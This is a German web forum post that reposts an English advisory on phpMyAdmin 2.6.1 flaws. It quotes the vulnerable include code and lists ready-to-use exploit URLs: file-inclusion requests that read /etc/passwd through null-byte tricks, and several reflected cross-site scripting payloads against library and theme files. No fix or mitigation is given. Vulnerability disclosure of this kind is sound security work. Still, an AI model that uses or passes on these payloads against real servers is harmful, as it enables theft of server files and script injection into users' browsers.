Impressum · Kontakt · Hilfe
wer ist online · Mitgliederliste



Portal > Foren > Offtopic > Plauderecke > falls noch der ein oder andere phpmyadmin 2.6.1 benutzt
Antwort
 
Themen-Optionen
Alt 08.11.2005, 18:18 Nach oben    #1
Goldman.de
 
Benutzerbild von J33d3X
 
Registriert seit: 09.10.2005
Ort: Frankfurt am Main
Beiträge: 190
Standard falls noch der ein oder andere phpmyadmin 2.6.1 benutzt
Code:
- --- 0.Description --- 
phpMyAdmin 2.6.1 is a tool written in PHP intended to 
handle the administration of MySQL over the Web. 
Currently it can create and drop databases, 
create/drop/alter tables, delete/edit/add fields, 
execute any SQL statement, manage keys on fields. 

- --- 1. Remote file inclusion --- 

1.0 

This bug exist in css/phpmyadmin.css.php. You can 
include files. Error exist in 

Code: 
- ------ 
$tmp_file = $GLOBALS['cfg']['ThemePath'] . '/' . 
$theme . '/css/theme_right.css.php'; 
if (@file_exists($tmp_file)) { 
include($tmp_file); 
} // end of include theme_right.css.php 
- ------ 

And now you can get files. 

For exemple: 

http://[HOST]/[DIR]/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc/passwd %00&theme=passwd%00 
http  ://[HOST]/[DIR]/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=pas swd%00 
etc. 

1.1 
Or next include is in libraries/database_interface.lib.php 

Code: 

- --- 
18# require_once('./libraries/dbi/' . $cfg['Server']['extension'] . '.dbi.lib.php'); 
- --- 

For exemple: 

http://[HOST]/[DIR]/libraries/database_interface.lib.php?cfg[Server][extension]=cXIb8O3 

Error message : 
- --------------- 
Warning: main(./libraries/dbi/cXIb8O3.dbi.lib.php) 
[function.main]: failed to open stream: No such file or 
directory in 
/www/phpMyAdmin-2.6.1/libraries/database_interface.lib.php 
on line 18 

Fatal error: main() [function.require]: Failed opening 
required './libraries/dbi/cXIb8O3.dbi.lib.php' 
(include_path='.:') in 
/www/phpMyAdmin-2.6.1/libraries/database_interface.lib.php 
on line 18 
- --------------- 


Or if you want and if you see php error and register_globals=on, can you make 
xss with php buq. For Exemple: 

http://[HOST]/[DIR]/libraries/database_interface.lib.php?cfg[Server][extension]=%3Ch1% 3EHi.%20I%20am%20cXIb8O3%3C/h1%3E 

- --- 2. XSS aka Cross Site Scripting --- 
If register_globals=On: 

2.0 
http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[S  ervers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&  strServer=[XSS%20code] 

http://[HOST]/[DIR]/libraries/select_serve  r.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&cfg[Bgcol  orOne]=777777%22%3E%3CH1%3E[XSS%20code] 

http://[HOST]/[DIR]/libraries  /select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=  toty&strServerChoice=%3CH1%3EXSS 

2.1 
http://[HOST]/[DIR]/librar  ies/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]= Mi&bgcolor=%22%3E[XSS%20code] 

http://[HOST]/[DIR]/libraries/di  splay_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&ro w_no=%22%3E[XSS%20code] 

2.2 
http://[HOST]/[DIR]/themes/original/css/theme_left.css.php?num_dbs=0&left_font_family =[XSS] 
and more in this file. 

2.3 
http://[HOST]/[DIR]/themes/original/css/theme_right.css.php?right_font_family=[XSS] 
and more in this file.

und dazu ein kühles Becks und einen schönen Abend noch
J33d3X ist offline  
Add Post to del.icio.usBookmark Post in TechnoratiDiesen Beitrag zu Mister Wong hinzufügen!
Mit Zitat antworten
Antwort

Lesezeichen

« nettes ff addon | AJAX Theme Engine für Wordpress »

Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)
 
Themen-Optionen

Forumregeln
Es ist dir nicht erlaubt, neue Themen zu verfassen.
Es ist dir nicht erlaubt, auf Beiträge zu antworten.
Es ist dir nicht erlaubt, Anhänge hochzuladen.
Es ist dir nicht erlaubt, deine Beiträge zu bearbeiten.
BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are an
Pingbacks are an
Refbacks are aus

Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
[XAMPP / MySQL] Probleme mit phpmyadmin Xean Tools, Server, Betriebssysteme 4 26.11.2006 20:24
Übersicht mit phpMyAdmin 2.6.4-pl3 ? CIX88 Datenbanken 12 21.12.2005 20:00
phpMyAdmin 2.7.0 beta 1 veröffentlicht Ben Nachrichten 8 08.12.2005 17:31
phpMyAdmin - lokale Zugriffsprobleme Ben Tools, Server, Betriebssysteme 12 23.08.2005 20:53
phpmyadmin installieren. wie? marko84 PHP-Programmierung 6 26.07.2005 20:27


Alle Zeitangaben in WEZ +2. Es ist jetzt 06:37 Uhr.

Kontakt - Developer's Guide - Archiv - Nach oben

Powered by vBulletin® Version 3.7.3 (Deutsch)
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Search Engine Optimization by vBSEO 3.2.0

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44